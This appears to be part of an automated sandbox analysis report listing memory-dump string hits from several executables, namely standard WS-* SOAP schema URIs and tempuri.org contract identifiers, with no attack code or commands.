Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/fault
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Aborted
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Commit
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Committed
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Completion
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Durable2PC
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepare
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Prepared
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/ReadOnly
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Replay
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Rollback
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/Volatile2PC
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wsat/fault
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContext
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/CreateCoordinationContextResponse
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/Register
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/RegisterResponse
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/10/wscoor/fault
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/AckRequested
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequence
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/LastMessage
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/SequenceAcknowledgement
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rm/TerminateSequence
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/rmX
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc/sct
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust#BinarySecret
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/CK/PSHA1
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Cancel
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Nonce
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/PublicKey
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Cancel
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/SCT/Renew
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Cancel
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/SCT/Renew
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Renew
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/SymmetricKey
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/spnego
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/tlsnego
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dns
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000025D0000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 00000013.00000002.2006862081.000001943435E000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/right/possessproperty
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2006/02/addressingidentity
Source: 8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue1
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue1Response
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue1ResponseD
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue2
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue2Response
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue2ResponseD
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue3
Source: 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue3Response
Source: 9AED.exe, 00000018.00000002.2633753789.00000000027AE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Contract/MSValue3ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/D
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id1
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id10ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006886000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id11ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id12ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13Response
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006968000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id13ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14Response
Source: 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id14ResponseD
Source: AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id15
